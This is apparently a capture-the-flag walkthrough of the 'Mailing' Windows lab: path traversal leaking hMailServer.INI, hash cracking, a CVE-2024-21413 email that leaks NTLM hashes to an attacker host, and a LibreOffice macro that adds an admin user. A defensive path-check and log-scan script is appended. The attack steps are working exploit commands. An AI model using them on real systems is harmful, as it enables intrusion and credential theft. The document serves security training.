Recon
Windows box with a full mail server stack. Multiple mail protocols are exposed alongside SMB and WinRM, the combination on Windows that should immediately trigger a credential hunt.

$ nmap -sC -sV -oN nmap/initial 10.129.5.20
25/tcp   open  smtp       hMailServer
80/tcp   open  http       Microsoft IIS 10.0
|_http-title: Mailing
110/tcp  open  pop3       hMailServer
143/tcp  open  imap       hMailServer
445/tcp  open  smb
587/tcp  open  smtp       hMailServer (submission)
993/tcp  open  ssl/imap
5985/tcp open  http       Microsoft HTTPAPI 2.0 (WinRM)
hMailServer is running on multiple ports. The web app at port 80 is a landing page for the mail service. I looked for information leakage there first.
Enumeration
LFI via Download Parameter
The web app exposes a /download.php?file= parameter for downloading resources. I tested it for path traversal:

$ curl "http://mailing.htb/download.php?file=../../../../../../Program+Files+(x86)/hMailServer/Bin/hMailServer.INI"
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c (MD5)
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
AdministratorPassword is an MD5 hash. Crack it:
$ hashcat -m 0 841bb5acfa6779ae432fd7a4e6600ba7 /usr/share/wordlists/rockyou.txt
841bb5acfa6779ae432fd7a4e6600ba7:homenetworkingadministrator
Logged into the hMailServer admin panel at http://mailing.htb/administrator/ with administrator:homenetworkingadministrator. I could now send mail as any account. I created attacker@mailing.htb and targeted maya@mailing.htb.
Foothold
CVE-2024-21413, the Microsoft Outlook MonikerLink vulnerability: a specially crafted mailto: link containing a UNC path (e.g. \\attacker\share\file.txt) in the link bypasses Outlook's Protected View. When the victim previews or opens the email, Outlook connects to the UNC share, which triggers NTLM authentication to the attacker's machine.
# start Responder to capture NTLM hash
$ sudo responder -I tun0

# send the exploit email
$ python3 CVE-2024-21413.py \
    --server mailing.htb \
    --port 587 \
    --username administrator@mailing.htb \
    --password homenetworkingadministrator \
    --sender attacker@mailing.htb \
    --recipient maya@mailing.htb \
    --url '\\10.10.14.X\share\meeting' \
    --subject "Team Meeting Notes"
[+] Email sent successfully

# Responder captures maya's NTLMv2 hash within seconds
[SMB] NTLMv2-SSP Hash     : maya::MAILING:1122334455667788:A4B3C2D1...
[+] NTLMv2 Hash captured from 10.129.5.20

$ hashcat -m 5600 maya_hash.txt /usr/share/wordlists/rockyou.txt
maya::MAILING:...:m3li@dc.

$ evil-winrm -i 10.129.5.20 -u maya -p 'm3li@dc.'
*Evil-WinRM* PS C:\Users\maya\Documents>
Privilege Escalation
I enumerated Maya's group memberships and accessible directories. Maya has write access to C:\Important Documents\, and a scheduled task running as administrator opens documents in that directory with LibreOffice.
LibreOffice supports macros in .odt files. I created a malicious .odt with a Basic macro that adds a local admin user, placed it in the watched directory, and waited for the scheduled task to execute it.
' macro in the .odt file (LibreOffice Basic)
Sub AutoOpen()
    Dim sCmd As String
    sCmd = "cmd.exe /c net user hacker Pass123! /add && net localgroup Administrators hacker /add"
    Shell "cmd.exe /c " & sCmd
End Sub

# place the .odt in the watched directory
*Evil-WinRM* PS C:\Users\maya\Documents> cp evil.odt "C:\Important Documents\"

# wait for the scheduled task to run...
$ evil-winrm -i 10.129.5.20 -u hacker -p 'Pass123!'
*Evil-WinRM* PS C:\Users\hacker\Documents> whoami /groups
MAILING\Administrators
Flags
Lessons Learned
- Path traversal in download.php-style endpoints leaks config files — always test file download parameters for directory traversal, especially on Windows where hMailServer.INI is a known sensitive target.
- CVE-2024-21413 demonstrates that email clients are reliable NTLM credential theft vectors — a previewed email can capture domain hashes without any clicks from the victim.
- Scheduled tasks that process user-controlled files are a privilege escalation path — LibreOffice, Word, Excel and other document processors that support macros are dangerous in this context.
- MD5-hashed passwords are still common in legacy application config files and remain trivially crackable — never store passwords as MD5 hashes.
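A hardening and detection counterpart to the download.php traversal above, added here as an example that is not part of the original writeup: a path-containment check a download endpoint should apply before opening any file, plus a scan of constructed access-log lines for requests that would have escaped the allowed directory. DOWNLOAD_ROOT, the log format and the sample log lines are assumptions made for this example.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed value for this example: the only directory download.php may serve.
DOWNLOAD_ROOT = "/var/www/mailing/downloads"

def resolve_download(root, requested):
    """Map a user-supplied file= value onto a path inside root, or return None.
    Handles what beats a naive '..' filter: percent-encoding (including double
    encoding), backslash separators on Windows hosts, absolute paths, NUL bytes.
    posixpath is used so the result is the same on any OS."""
    decoded = requested
    for _ in range(3):  # decode until stable so %252e%252e cannot slip through
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "\x00" in decoded:
        return None
    decoded = decoded.replace("\\", "/")  # IIS/PHP on Windows accept both
    root_norm = posixpath.normpath(root)
    # join() discards root when the input is absolute; normpath collapses '..'
    candidate = posixpath.normpath(posixpath.join(root_norm, decoded))
    if not candidate.startswith(root_norm + "/"):
        return None  # escaped the root, or named the root directory itself
    return candidate

LOG_RE = re.compile(r'"GET (?P<target>\S+) HTTP/[\d.]+"')

def flag_traversal_requests(log_lines, root=DOWNLOAD_ROOT):
    """Return file= values from access-log lines that would escape root."""
    flagged = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group("target")).query)
        for value in query.get("file", []):
            if resolve_download(root, value) is None:
                flagged.append(value)
    return flagged

# Constructed sample access-log lines, not taken from the original post.
SAMPLE_LOG = [
    '10.10.14.5 - - [01/Jan/2024:10:00:00 +0000] "GET /download.php?file=report.pdf HTTP/1.1" 200 4096',
    '10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /download.php?file=../../../../../../Program+Files+(x86)/hMailServer/Bin/hMailServer.INI HTTP/1.1" 200 512',
    '10.10.14.5 - - [01/Jan/2024:10:00:02 +0000] "GET /download.php?file=..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 0',
]
```

Note that a relative path that stays inside the root, such as docs/../guide.pdf, is still allowed; the check is on the resolved location, not on the presence of "..".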